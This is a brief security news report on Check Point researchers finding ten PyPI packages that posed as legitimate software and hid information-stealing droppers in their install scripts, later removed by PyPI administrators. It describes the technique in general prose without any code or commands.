Security researchers have discovered a set of 10 software packages containing malicious code in the Python Package Index (PyPI) repository, which turned out to be droppers for information-stealing malware.
The offending packages were designed to look like legitimate software and in some cases disguised as other popular packages on PyPI, such as Ascii2text.
According to Check Point researchers, the bad actors behind the malicious packages embedded malicious code into the package installation script so the malware would be installed on a victim’s machine unnoticed.
In case of the fake package called Ascii2text the malicious code was hidden in a file (_init_.py) imported by the installation script (setup.py).
“The code on the __init__.py file was responsible for downloading and executing a malicious script which searches for local passwords and uploads them using a discord web hook,” Check Point explained.
Based on some facts, the researchers believe that three of the 10 malicious packages (Pyg-utils, Pymocks and PyProto2) have been developed by the same author behind the recent Pygrata campaign whose aim was to harvest users’ AWS credentials.
Upon discovering the malicious packages Check Point contacted the PyPI administrators and the rogue software was removed from the repository.